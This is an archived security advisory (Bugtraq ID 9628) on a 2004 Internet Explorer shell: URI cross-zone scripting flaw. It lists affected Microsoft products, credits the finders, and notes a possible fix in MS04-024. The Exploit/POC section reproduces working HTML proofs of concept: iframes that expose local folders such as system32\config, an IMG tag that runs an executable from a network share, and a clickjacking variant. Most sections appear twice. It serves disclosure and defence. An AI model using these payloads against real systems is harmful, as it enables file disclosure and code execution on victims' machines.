Microsoft Internet Explorer Shell: IFrame Cross-Zone Scripting Vulnerability
BID:9628
Info
Microsoft Internet Explorer Shell: IFrame Cross-Zone Scripting Vulnerability
| Bugtraq ID: | 9628 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 10 2004 12:00AM |
| Updated: | Feb 10 2004 12:00AM |
| Credit: | Discovery of this issue is credited to Cheng Peng Su; this issue was also independently discovered by roozbeh afrasiabi <[email protected]>. |
| Vulnerable: |
Microsoft Word 2003 Microsoft Word 2002 SP2 Microsoft Word 2002 SP1 Microsoft Word 2002 Microsoft Word 2000 SR1a Microsoft Word 2000 SR1 Microsoft Word 2000 SP3 Microsoft Word 2000 SP2 Microsoft Word 2000 Microsoft Outlook Express 6.0 SP1 Microsoft Outlook Express 6.0 Microsoft Outlook Express 5.5 SP2 Microsoft Outlook Express 5.5 SP1 Microsoft Outlook Express 5.5 Microsoft Outlook Express 5.0 Microsoft Outlook 2003 0 Microsoft MSN Messenger Service 6.0.602 Microsoft MSN Messenger Service 6.1 Microsoft MSN Messenger Service 6.0 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer Shell: IFrame Cross-Zone Scripting Vulnerability
It has been alleged that Microsoft Internet Explorer is prone to a weakness that may potentially allow for the execution of hostile script code in the context of the My Computer Zone. This issue is related to how shell: URIs are handled by the browser. It should also be noted that shell: URIs may be used to reference local content in the same manner as file:// URIs.
Update: Although unconfirmed, further reports indicate that MSN messenger version 6.2.0137, Microsoft Word, Outlook 2003, and Outlook Express may also potentially provide exploitation vectors for this vulnerability.
It has been alleged that Microsoft Internet Explorer is prone to a weakness that may potentially allow for the execution of hostile script code in the context of the My Computer Zone. This issue is related to how shell: URIs are handled by the browser. It should also be noted that shell: URIs may be used to reference local content in the same manner as file:// URIs.
Update: Although unconfirmed, further reports indicate that MSN messenger version 6.2.0137, Microsoft Word, Outlook 2003, and Outlook Express may also potentially provide exploitation vectors for this vulnerability.
Exploit / POC
Microsoft Internet Explorer Shell: IFrame Cross-Zone Scripting Vulnerability
The following proof-of-concept has been provided:
<iframe src="shell:my music"/>
roozbeh afrasiabi <[email protected]> has provided the following proof of concepts, including (DiscloseNFO (IE 6+ 6SP1) & ReadCookies (IE6)):
<iframe id="Target" src='shell:windows' name="x" width="875"
height="527">
</iframe>
<iframe id="Target" src='shell:windows\system32\config\' name="x"
width="875" height="527">
</iframe>
<iframe id="Target"
src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}' name="x"
width="875" height="527">
</iframe>
<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:' name="x"
width="875" height="527">
</iframe>
<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}'
name="x" width="875" height="527">
</iframe>
<iframe id="Target" src='{E773F1AF-3A65-4866-857D-846FC9C4598A}'
name="x" width="875" height="527">
</iframe>
<a target="_blank"
href="shell:::{3E9BAF2D-7A79-11d2-9334-0000F875AE17}">click</a>
Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.
Liu Die Yu has supplied a proof of concept for a 'shell:' URI remote file execution vector:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER:
<IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">
A variant of the proof of concept of the exploit listed in BID 10690 (Microsoft Internet Explorer Popup.show Mouse Event Hijacking Vulnerability) has been supplied by http-equiv.:
Just substitute the following:
1. <img src="greyhat.html" id=anch
onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=
2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert
()',3000);" style="width=168px;height=152px;background-image:url
('youlickit.gif');cursor:hand" title="click me!"></a>
2. location="shell:favorites\\greyhat[1].htm"
An additional proof-of-concept was released by http-equiv that demonstrates a method of using this issue in addition to BID 10517 to install an executable on a victim system:
http://www.malware.com/wattadrag.html
The following proof-of-concept has been provided:
<iframe src="shell:my music"/>
roozbeh afrasiabi <[email protected]> has provided the following proof of concepts, including (DiscloseNFO (IE 6+ 6SP1) & ReadCookies (IE6)):
<iframe id="Target" src='shell:windows' name="x" width="875"
height="527">
</iframe>
<iframe id="Target" src='shell:windows\system32\config\' name="x"
width="875" height="527">
</iframe>
<iframe id="Target"
src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}' name="x"
width="875" height="527">
</iframe>
<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:' name="x"
width="875" height="527">
</iframe>
<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}'
name="x" width="875" height="527">
</iframe>
<iframe id="Target" src='{E773F1AF-3A65-4866-857D-846FC9C4598A}'
name="x" width="875" height="527">
</iframe>
<a target="_blank"
href="shell:::{3E9BAF2D-7A79-11d2-9334-0000F875AE17}">click</a>
Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.
Liu Die Yu has supplied a proof of concept for a 'shell:' URI remote file execution vector:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER:
<IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">
A variant of the proof of concept of the exploit listed in BID 10690 (Microsoft Internet Explorer Popup.show Mouse Event Hijacking Vulnerability) has been supplied by http-equiv.:
Just substitute the following:
1. <img src="greyhat.html" id=anch
onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=
2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert
()',3000);" style="width=168px;height=152px;background-image:url
('youlickit.gif');cursor:hand" title="click me!"></a>
2. location="shell:favorites\\greyhat[1].htm"
An additional proof-of-concept was released by http-equiv that demonstrates a method of using this issue in addition to BID 10517 to install an executable on a victim system:
http://www.malware.com/wattadrag.html
Solution / Fix
Microsoft Internet Explorer Shell: IFrame Cross-Zone Scripting Vulnerability
Solution:
It is reported that this issue is allegedly addressed by Microsoft Security Bulletin MS04-024. This information is not confirmed at the moment. Please contact Microsoft for more information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
It is reported that this issue is allegedly addressed by Microsoft Security Bulletin MS04-024. This information is not confirmed at the moment. Please contact Microsoft for more information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer Shell: IFrame Cross-Zone Scripting Vulnerability
References:
References:
- Microsoft Security Bulletin MS04-024 (Microsoft)
- Possible new cross zone scripting in IE (Cheng Peng Su
) - Re: HijackClick 3 ("[email protected]" <[email protected]>)
- Re: IE ms-its: and mk:@MSITStore: vulnerability (roozbeh afrasiabi
) - What A Drag ("[email protected]" <[email protected]>)